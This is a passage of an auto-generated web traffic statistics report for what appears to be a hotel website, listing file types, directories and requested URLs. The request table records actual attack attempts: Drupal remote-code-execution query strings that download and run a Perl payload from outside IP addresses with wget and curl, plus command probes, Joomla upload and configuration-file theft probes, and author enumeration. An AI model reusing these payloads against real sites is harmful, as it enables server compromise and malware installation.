<tr><td class="R">25741</td><td class="b">26.74%</td><td class="xl">[directories]</td></tr>
<tr><td class="R">14983</td><td class="b">15.18%</td><td class="xl">[no extension]</td></tr>
<tr><td class="R">3915</td><td class="b">13.43%</td><td class="xl">.jpg  [JPEG graphics]</td></tr>
<tr><td class="R">8804</td><td class="b"> 5.36%</td><td class="xl">.css  [Cascading Style Sheets]</td></tr>
<tr><td class="R">4203</td><td class="b"> 4.06%</td><td class="xl">.php  [PHP]</td></tr>
<tr><td class="R">8384</td><td class="b"> 2.07%</td><td class="xl">.png  [PNG graphics]</td></tr>
<tr><td class="R">118</td><td class="b"> 0.50%</td><td class="xl">.swf</td></tr>
<tr><td class="R">1978</td><td class="b"> 0.34%</td><td class="xl">.html [Hypertext Markup Language]</td></tr>
<tr><td class="R">1050</td><td class="b"> 0.08%</td><td class="xl">[not listed: 2 extensions]</td></tr>
</tbody></table>
</div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p>
<p><img src="./dir.png" alt="" /></p>
<p class="whatinc">
Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead>
<tbody><tr><td class="R">43020</td><td class="b">53.97%</td><td class="xl">/assets/</td></tr>
<tr><td class="R">43338</td><td class="b">43.98%</td><td class="xl">[root directory]</td></tr>
<tr><td class="R">2073</td><td class="b"> 1.72%</td><td class="xl">/facilities/</td></tr>
<tr><td class="R">194</td><td class="b"> 0.27%</td><td class="xl">/contact-us/</td></tr>
<tr><td class="R">47</td><td class="b"> 0.05%</td><td class="xl">/index.php/</td></tr>
<tr><td class="R">1</td><td class="b">&nbsp;</td><td class="xl">[not listed: 1 directory]</td></tr>
</tbody></table>
</div><div class="req"><h2><a name="req" id="req">Request Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p>
<p><img src="./req.png" alt="" /></p>
<p class="whatinc">
Listing files with at least 20 requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead>
<tbody><tr><td class="R">25529</td><td class="b">26.45%</td><td class="D">May/31/19  5:07 PM</td><td class="xl"><a href="/">/</a></td></tr>
<tr class="sub level2"><td class="R">257</td><td class="b"> 0.27%</td><td class="D">May/13/19 10:52 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?id=1">/?id=1</a></td></tr>
<tr class="sub level2"><td class="R">101</td><td class="b"> 0.10%</td><td class="D">Feb/12/19  6:05 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.211.147">/?172.68.211.147</a></td></tr>
<tr class="sub level2"><td class="R">96</td><td class="b"> 0.10%</td><td class="D">May/10/19  8:20 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=file/ajax/name/%23value/">/?q=file/ajax/name/#value/</a></td></tr>
<tr class="sub level2"><td class="R">42</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=1">/?author=1</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=10">/?author=10</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=12">/?author=12</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=13">/?author=13</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=14">/?author=14</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=15">/?author=15</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=2">/?author=2</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=3">/?author=3</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=4">/?author=4</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=5">/?author=5</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=7">/?author=7</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=8">/?author=8</a></td></tr>
<tr class="sub level2"><td class="R">38</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=9">/?author=9</a></td></tr>
<tr class="sub level2"><td class="R">37</td><td class="b"> 0.04%</td><td class="D">May/23/19 11:31 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=11">/?author=11</a></td></tr>
<tr class="sub level2"><td class="R">37</td><td class="b"> 0.04%</td><td class="D">May/26/19 12:41 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=6">/?author=6</a></td></tr>
<tr class="sub level2"><td class="R">33</td><td class="b"> 0.03%</td><td class="D">May/25/19  2:33 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/register">/?q=user/register</a></td></tr>
<tr class="sub level2"><td class="R">27</td><td class="b"> 0.03%</td><td class="D">May/25/19  2:33 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/add">/?q=node/add</a></td></tr>
<tr class="sub level2"><td class="R">24</td><td class="b"> 0.03%</td><td class="D">May/29/19  5:40 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?46.101.9.216">/?46.101.9.216</a></td></tr>
<tr class="sub level2"><td class="R">18</td><td class="b"> 0.02%</td><td class="D">May/10/19  8:20 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.114/index.log.2018.06.26 ; lwp-download http://31.184.195.114/index.log.2018.06.26 ; curl -O http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.02%</td><td class="D">Mar/24/19  5:44 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.27.13">/?172.68.27.13</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">May/10/19  6:29 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; cd /tmp/ ; wget http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.114/index.log.2018.06.26 ; lwp-download http://31.184.195.114/index.log.2018.06.26 ; curl -O http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">14</td><td class="b"> 0.01%</td><td class="D">May/14/18  4:47 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=uname+-a">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">13</td><td class="b"> 0.01%</td><td class="D">Dec/ 8/18  4:01 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]= cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Mar/10/19  4:26 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/99/delete&amp;destination=node?q%5B%2523%5D%5B%5D=passthru%26q%5B%2523type%5D=markup%26q%5B%2523markup%5D=id;uname+-a">/?q=node/99/delete&amp;destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=id;uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Feb/20/19  4:29 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr><td class="R">2248</td><td class="b"> 3.05%</td><td class="D">May/31/19  2:51 PM</td><td class="xl">/contact-us</td></tr>
<tr><td class="R">2114</td><td class="b"> 2.00%</td><td class="D">May/31/19  4:29 PM</td><td class="xl">/accommodation</td></tr>
<tr><td class="R">2100</td><td class="b"> 2.73%</td><td class="D">May/31/19  3:35 PM</td><td class="xl">/gallery</td></tr>
<tr><td class="R">1692</td><td class="b"> 0.76%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/misc/drupal.js</td></tr>
<tr class="sub level2"><td class="R">1210</td><td class="b"> 0.51%</td><td class="D">Dec/23/18 10:50 AM</td><td class="xl">&nbsp;&nbsp;/assets/js/misc/drupal.js?nsbnfj</td></tr>
<tr><td class="R">1551</td><td class="b"> 0.12%</td><td class="D">May/30/19  5:54 AM</td><td class="xl">/assets/img/logo_main.png</td></tr>
<tr><td class="R">1466</td><td class="b"> 1.22%</td><td class="D">May/31/19  4:32 PM</td><td class="xl">/location</td></tr>
<tr><td class="R">1409</td><td class="b">18.83%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/jquery-ui.js</td></tr>
<tr><td class="R">1371</td><td class="b"> 0.48%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/modernizr.min.js</td></tr>
<tr><td class="R">1359</td><td class="b"> 0.91%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/owl.carousel.min.js</td></tr>
<tr><td class="R">1344</td><td class="b"> 3.50%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/jquery-1.11.2.min.js</td></tr>
<tr><td class="R">1300</td><td class="b"> 0.27%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/cssmin.js</td></tr>
<tr><td class="R">1296</td><td class="b"> 0.09%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/lazyloadxt.min.js</td></tr>
<tr><td class="R">1296</td><td class="b"> 1.30%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/bootstrap.min.js</td></tr>
<tr><td class="R">1279</td><td class="b"> 0.19%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/jquery.bootstrap.newsbox.min.js</td></tr>
<tr><td class="R">1274</td><td class="b"> 0.01%</td><td class="D">May/31/19  7:46 AM</td><td class="xl">/assets/js/lazyloadxt.bg.min.js</td></tr>
<tr><td class="R">1265</td><td class="b"> 1.05%</td><td class="D">May/31/19  3:35 PM</td><td class="xl">/promotions</td></tr>
<tr><td class="R">1264</td><td class="b"> 0.99%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/jquery.nivo.slider.js</td></tr>
<tr><td class="R">1262</td><td class="b"> 0.07%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/responsive_navigation_firs.js</td></tr>
<tr><td class="R">1258</td><td class="b"> 0.48%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/js/scripts.js</td></tr>
<tr><td class="R">1059</td><td class="b"> 0.84%</td><td class="D">May/31/19  5:27 AM</td><td class="xl">/about-us</td></tr>
<tr><td class="R">1022</td><td class="b"> 0.03%</td><td class="D">May/26/19  5:41 AM</td><td class="xl">/assets/css/fonts.css</td></tr>
<tr><td class="R">1004</td><td class="b"> 0.10%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/css/styles.css</td></tr>
<tr><td class="R">993</td><td class="b"> 0.84%</td><td class="D">May/31/19  5:27 AM</td><td class="xl">/facilities/restaurant</td></tr>
<tr><td class="R">978</td><td class="b"> 3.12%</td><td class="D">May/31/19  5:26 AM</td><td class="xl">/assets/css/firs_main.css</td></tr>
<tr><td class="R">940</td><td class="b"> 0.63%</td><td class="D">May/30/19  3:16 AM</td><td class="xl">/assets/css/responsive.css</td></tr>
<tr><td class="R">934</td><td class="b"> 0.88%</td><td class="D">May/31/19  4:29 PM</td><td class="xl">/facilities</td></tr>
<tr><td class="R">922</td><td class="b"> 1.02%</td><td class="D">May/27/19  7:19 PM</td><td class="xl">/assets/css/jquery-ui.css</td></tr>
<tr><td class="R">888</td><td class="b"> 0.10%</td><td class="D">May/29/19  9:33 AM</td><td class="xl">/assets/css/accordian.css</td></tr>
<tr><td class="R">875</td><td class="b"> 0.05%</td><td class="D">May/28/19  9:22 PM</td><td class="xl">/assets/owl-carousel/owl.theme.css</td></tr>
<tr><td class="R">855</td><td class="b"> 0.05%</td><td class="D">May/28/19  9:22 PM</td><td class="xl">/assets/owl-carousel/owl.carousel.css</td></tr>
<tr><td class="R">844</td><td class="b"> 0.68%</td><td class="D">May/31/19  5:27 AM</td><td class="xl">/facilities/room-service</td></tr>
<tr><td class="R">816</td><td class="b"> 0.21%</td><td class="D">May/28/19  9:22 PM</td><td class="xl">/assets/css/magnific-popup.css</td></tr>
<tr><td class="R">743</td><td class="b"> 0.16%</td><td class="D">May/31/19 12:29 PM</td><td class="xl"><a href="/assets/360/lobby-home.html">/assets/360/lobby-home.html</a></td></tr>
<tr><td class="R">729</td><td class="b"> 0.77%</td><td class="D">May/30/19  8:16 AM</td><td class="xl">/index.php</td></tr>
<tr class="sub level2"><td class="R">73</td><td class="b"> 0.08%</td><td class="D">May/25/19  8:51 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jce&amp;task=plugin&amp;plugin=imgmanager&amp;file=imgmanager&amp;method=form</td></tr>
<tr class="sub level2"><td class="R">58</td><td class="b"> 0.06%</td><td class="D">May/25/19  8:48 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component</td></tr>
<tr class="sub level2"><td class="R">51</td><td class="b"> 0.05%</td><td class="D">May/25/19  8:50 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jdownloads&amp;Itemid=0&amp;view=upload</td></tr>
<tr class="sub level2"><td class="R">35</td><td class="b"> 0.04%</td><td class="D">May/25/19  8:50 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_joomanager&amp;controller=details&amp;task=download&amp;path=configuration.php</td></tr>
<tr class="sub level2"><td class="R">30</td><td class="b"> 0.03%</td><td class="D">May/26/19  5:06 PM</td><td class="xl">&nbsp;&nbsp;/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1</td></tr>
<tr class="sub level2"><td class="R">27</td><td class="b"> 0.03%</td><td class="D">May/25/19  8:50 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_myblog&amp;task=ajaxupload</td></tr>
<tr class="sub level2"><td class="R">24</td><td class="b"> 0.03%</td><td class="D">May/25/19  8:49 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=</td></tr>
<tr class="sub level2"><td class="R">23</td><td class="b"> 0.02%</td><td class="D">May/25/19  8:49 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_cckjseblod&amp;task=download&amp;file=configuration.php</td></tr>
<tr><td class="R">711</td><td class="b"> 0.09%</td><td class="D">May/30/19  9:57 AM</td><td class="xl">/assets/img/favicon.png</td></tr>
<tr><td class="R">696</td><td class="b"> 0.01%</td><td class="D">May/25/19 11:27 PM</td><td class="xl">/assets/img/icon.png</td></tr>
<tr><td class="R">684</td><td class="b"> 0.20%</td><td class="D">May/25/19 11:27 PM</td><td class="xl">/assets/img/logo.png</td></tr>
<tr><td class="R">575</td><td class="b"> 0.49%</td><td class="D">May/31/19 11:34 AM</td><td class="xl">/downloads</td></tr>
<tr><td class="R">567</td><td class="b"> 0.56%</td><td class="D">May/31/19  5:27 AM</td><td class="xl">/privacy-policy</td></tr>
<tr><td class="R">544</td><td class="b"> 0.58%</td><td class="D">May/31/19  1:22 PM</td><td class="xl">/terms-and-conditions</td></tr>
<tr><td class="R">509</td><td class="b"> 0.04%</td><td class="D">May/23/19 11:20 PM</td><td class="xl">/assets/img/rght_arrow.png</td></tr>
<tr><td class="R">451</td><td class="b"> 0.61%</td><td class="D">May/30/19  8:42 AM</td><td class="xl">/contact-us.php</td></tr>
<tr><td class="R">432</td><td class="b"> 2.08%</td><td class="D">May/30/19 11:41 AM</td><td class="xl">/assets/js/jssor.slider.js</td></tr>
<tr><td class="R">431</td><td class="b"> 0.03%</td><td class="D">May/25/19 11:27 PM</td><td class="xl">/assets/img/loading.gif</td></tr>
<tr><td class="R">413</td><td class="b"> 1.05%</td><td class="D">May/30/19 11:41 AM</td><td class="xl">/assets/js/jssor.js</td></tr>
<tr><td class="R">407</td><td class="b"> 0.38%</td><td class="D">May/28/19  9:22 PM</td><td class="xl">/assets/img/firs_payment_methods.png</td></tr>
<tr><td class="R">349</td><td class="b"> 0.21%</td><td class="D">May/31/19  3:35 PM</td><td class="xl">/assets/js/jquery.magnific-popup.min.js</td></tr>
<tr><td class="R">333</td><td class="b"> 0.27%</td><td class="D">May/31/19  2:20 AM</td><td class="xl">/about-us.php</td></tr>
<tr><td class="R">327</td><td class="b"> 0.31%</td><td class="D">May/31/19 12:29 PM</td><td class="xl">/assets/js/jquery.colorbox.js</td></tr>
<tr><td class="R">311</td><td class="b"> 0.27%</td><td class="D">May/31/19  4:30 PM</td><td class="xl">/room-services.php</td></tr>
<tr><td class="R">309</td><td class="b"> 0.14%</td><td class="D">May/30/19  5:41 PM</td><td class="xl">/location.php</td></tr>
<tr><td class="R">306</td><td class="b"> 0.29%</td><td class="D">May/30/19  9:57 PM</td><td class="xl">/restaurant.php</td></tr>
<tr><td class="R">296</td><td class="b"> 0.01%</td><td class="D">May/30/19  8:16 AM</td><td class="xl"><a href="/cont_pop.html">/cont_pop.html</a></td></tr>
<tr class="sub level2"><td class="R">12</td><td class="b">&nbsp;</td><td class="D">May/ 4/19  3:32 PM</td><td class="xl">&nbsp;&nbsp;<a href="/cont_pop.html?lightbox%5Bwidth%5D=800&amp;lightbox%5Bheight%5D=300">/cont_pop.html?lightbox[width]=800&amp;lightbox[height]=300</a></td></tr>
<tr><td class="R">291</td><td class="b"> 0.04%</td><td class="D">May/26/19  6:34 PM</td><td class="xl">/assets/img/a11.png</td></tr>
<tr><td class="R">289</td><td class="b"> 0.01%</td><td class="D">May/26/19  6:45 PM</td><td class="xl">/assets/img/contactus.png</td></tr>
<tr><td class="R">275</td><td class="b"> 0.04%</td><td class="D">May/29/19 12:12 PM</td><td class="xl">/assets/css/colorbox.css</td></tr>
<tr><td class="R">270</td><td class="b"> 0.06%</td><td class="D">May/25/19 11:28 PM</td><td class="xl"><a href="/assets/360/reinhart_room-home.html">/assets/360/reinhart_room-home.html</a></td></tr>
<tr><td class="R">270</td><td class="b"> 0.01%</td><td class="D">May/23/19 11:30 PM</td><td class="xl">/assets/img/arrows.png</td></tr>
<tr><td class="R">265</td><td class="b"> 0.01%</td><td class="D">May/23/19 11:30 PM</td><td class="xl">/assets/img/bullets.png</td></tr>
<tr><td class="R">253</td><td class="b"> 0.14%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/lobby/swfobject/swfkrpano.js</td></tr>
<tr><td class="R">251</td><td class="b"> 0.24%</td><td class="D">May/30/19  8:47 AM</td><td class="xl">/accommodation.php</td></tr>
<tr><td class="R">248</td><td class="b"> 0.44%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/js/jquery.carouFredSel-6.2.1-packed.js</td></tr>
<tr><td class="R">242</td><td class="b"> 0.22%</td><td class="D">May/29/19  3:13 PM</td><td class="xl">/bar.php</td></tr>
<tr><td class="R">238</td><td class="b"> 0.01%</td><td class="D">May/30/19 12:04 PM</td><td class="xl"><a href="/map_pop.html">/map_pop.html</a></td></tr>
<tr><td class="R">236</td><td class="b"> 1.30%</td><td class="D">May/29/19 12:12 PM</td><td class="xl">/assets/images/cont-us.jpg</td></tr>
<tr><td class="R">235</td><td class="b"> 0.31%</td><td class="D">May/31/19  8:52 AM</td><td class="xl">/gallery.php</td></tr>
<tr><td class="R">229</td><td class="b">&nbsp;</td><td class="D">May/31/19 12:47 PM</td><td class="xl">/assets/img/map.png</td></tr>
<tr><td class="R">229</td><td class="b"> 0.01%</td><td class="D">May/30/19  2:22 PM</td><td class="xl">/assets/360/css/style.css</td></tr>
<tr><td class="R">220</td><td class="b"> 0.05%</td><td class="D">May/27/19  8:57 PM</td><td class="xl"><a href="/assets/360/molly_suite-home.html">/assets/360/molly_suite-home.html</a></td></tr>
<tr><td class="R">218</td><td class="b"> 0.23%</td><td class="D">May/29/19  9:11 PM</td><td class="xl">/terms-and-conditions.php</td></tr>
<tr><td class="R">211</td><td class="b"> 0.05%</td><td class="D">May/31/19  2:12 AM</td><td class="xl"><a href="/assets/360/stephan_suite-home.html">/assets/360/stephan_suite-home.html</a></td></tr>
<tr><td class="R">194</td><td class="b"> 0.27%</td><td class="D">May/28/19 12:53 PM</td><td class="xl"><a href="/contact-us/">/contact-us/</a></td></tr>
<tr><td class="R">194</td><td class="b"> 0.18%</td><td class="D">May/31/19  3:24 PM</td><td class="xl">/facilities.php</td></tr>
<tr><td class="R">192</td><td class="b"> 0.02%</td><td class="D">May/31/19 10:28 AM</td><td class="xl">/sitemap.xml</td></tr>
<tr><td class="R">188</td><td class="b"> 0.19%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/lobby.jpg</td></tr>
<tr><td class="R">185</td><td class="b"> 0.15%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/stephan_suite.jpg</td></tr>
<tr><td class="R">182</td><td class="b"> 0.18%</td><td class="D">May/25/19 11:27 PM</td><td class="xl">/assets/360/images/reinhart_room.jpg</td></tr>
<tr><td class="R">182</td><td class="b"> 0.04%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/hide-vertical.png</td></tr>
<tr><td class="R">181</td><td class="b">&nbsp;</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/callout.gif</td></tr>
<tr><td class="R">181</td><td class="b"> 0.15%</td><td class="D">May/31/19  2:00 AM</td><td class="xl">/promotions.php</td></tr>
<tr><td class="R">178</td><td class="b"> 0.22%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/molly_suite.jpg</td></tr>
<tr><td class="R">176</td><td class="b"> 0.23%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/firs-360.png</td></tr>
<tr><td class="R">173</td><td class="b"> 0.16%</td><td class="D">May/30/19  1:26 PM</td><td class="xl">/assets/360/images/bg_03.png</td></tr>
<tr><td class="R">172</td><td class="b"> 0.01%</td><td class="D">May/25/19 11:27 PM</td><td class="xl">/assets/360/images/show-vertical.png</td></tr>
<tr><td class="R">172</td><td class="b">&nbsp;</td><td class="D">May/31/19 12:47 PM</td><td class="xl">/assets/css/images/overlay.png</td></tr>
<tr><td class="R">166</td><td class="b"> 0.09%</td><td class="D">May/22/19  5:06 PM</td><td class="xl">/assets/img/cal_rght.png</td></tr>
<tr><td class="R">165</td><td class="b"> 0.14%</td><td class="D">May/30/19  8:50 AM</td><td class="xl">/downloads.php</td></tr>
<tr><td class="R">151</td><td class="b"> 0.08%</td><td class="D">May/25/19  4:03 AM</td><td class="xl">/assets/img/cal_lft.png</td></tr>
<tr><td class="R">146</td><td class="b">&nbsp;</td><td class="D">May/16/19 11:52 AM</td><td class="xl">/assets/css/ui-bg_glass_65_ffffff_1x400.png</td></tr>
<tr><td class="R">142</td><td class="b"> 0.12%</td><td class="D">May/28/19 10:38 PM</td><td class="xl">/advance-purchase.php</td></tr>
<tr><td class="R">135</td><td class="b"> 0.13%</td><td class="D">May/28/19 10:38 PM</td><td class="xl">/privacy-policy.php</td></tr>
<tr><td class="R">101</td><td class="b"> 0.16%</td><td class="D">May/28/19  2:27 AM</td><td class="xl">/assets/img/qr_back.png</td></tr>
<tr><td class="R">101</td><td class="b"> 0.04%</td><td class="D">May/28/19  2:27 AM</td><td class="xl">/assets/img/back.jpg</td></tr>
<tr><td class="R">98</td><td class="b"> 0.26%</td><td class="D">May/28/19  2:27 AM</td><td class="xl">/assets/img/pop_contact_back.png</td></tr>
